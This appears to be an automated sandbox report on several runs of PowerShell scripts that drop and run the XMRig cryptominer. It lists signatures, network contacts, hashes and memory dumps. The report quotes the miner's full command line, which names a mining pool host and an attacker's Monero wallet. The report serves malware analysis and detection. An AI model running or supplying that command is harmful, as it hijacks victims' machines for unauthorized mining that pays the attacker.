| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1972 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1972 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1972-3-0x00007FF8ED503000-0x00007FF8ED504000-memory.dmp
memory/1972-5-0x0000026C1E220000-0x0000026C1E242000-memory.dmp
memory/1972-6-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/1972-10-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/1972-9-0x0000026C369F0000-0x0000026C36A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isxlfegc.wfa.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1972-25-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/1972-48-0x0000026C36990000-0x0000026C369A2000-memory.dmp
memory/1972-61-0x0000026C36970000-0x0000026C3697A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4556-90-0x000002E7BD6A0000-0x000002E7BD6C0000-memory.dmp
memory/1972-91-0x00007FF8ED503000-0x00007FF8ED504000-memory.dmp
memory/1972-92-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/4556-93-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-94-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/1972-95-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/1972-96-0x00007FF8ED500000-0x00007FF8EDEEC000-memory.dmp
memory/4556-97-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-98-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-99-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-100-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-101-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-102-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-103-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-104-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-105-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-106-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-107-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-108-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-109-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-110-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-111-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-112-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-113-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-114-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-115-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-116-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-117-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-118-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-119-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-120-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-121-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-122-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-123-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-124-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-125-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-126-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-127-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-128-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-129-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-130-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-131-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-132-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-133-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-134-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-135-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-136-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-137-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-138-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-139-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-140-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-141-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-142-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-143-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-144-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-145-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-146-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-147-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-148-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-149-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-150-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-151-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-152-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-153-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-154-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-155-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-156-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
memory/4556-157-0x00007FF7C1490000-0x00007FF7C20C3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5000 wrote to memory of 4400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5000 wrote to memory of 4400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/5000-0-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/5000-6-0x00000249FE410000-0x00000249FE432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qr0evrap.yaq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5000-11-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-12-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-14-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-15-0x00000249FEFD0000-0x00000249FEFE2000-memory.dmp
memory/5000-16-0x00000249FEFC0000-0x00000249FEFCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4400-47-0x000002990B850000-0x000002990B870000-memory.dmp
memory/4400-48-0x000002990D240000-0x000002990D260000-memory.dmp
memory/4400-49-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-51-0x000002990D280000-0x000002990D2A0000-memory.dmp
memory/4400-50-0x000002990D260000-0x000002990D280000-memory.dmp
memory/4400-52-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/5000-53-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/5000-54-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-56-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/4400-55-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-59-0x000002990D280000-0x000002990D2A0000-memory.dmp
memory/4400-58-0x000002990D260000-0x000002990D280000-memory.dmp
memory/4400-57-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-60-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-61-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-62-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-63-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-64-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-65-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-66-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-67-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-68-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-69-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-70-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-71-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-72-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-73-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-74-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-75-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-76-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-77-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-78-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-79-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-80-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-81-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-82-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-83-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-84-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-85-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-86-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-87-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-88-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-89-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-90-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-91-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-92-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-93-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-94-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-95-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-96-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-97-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-98-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-99-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-100-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-101-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-102-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-103-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-104-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-105-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-106-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-107-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-108-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-109-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-110-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-111-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-112-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-113-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-114-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-115-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-116-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-117-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-118-0x00007FF780C20000-0x00007FF781853000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:41
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
Files
memory/2840-4-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp
memory/2840-7-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp
memory/2840-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2840-10-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-11-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:43
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
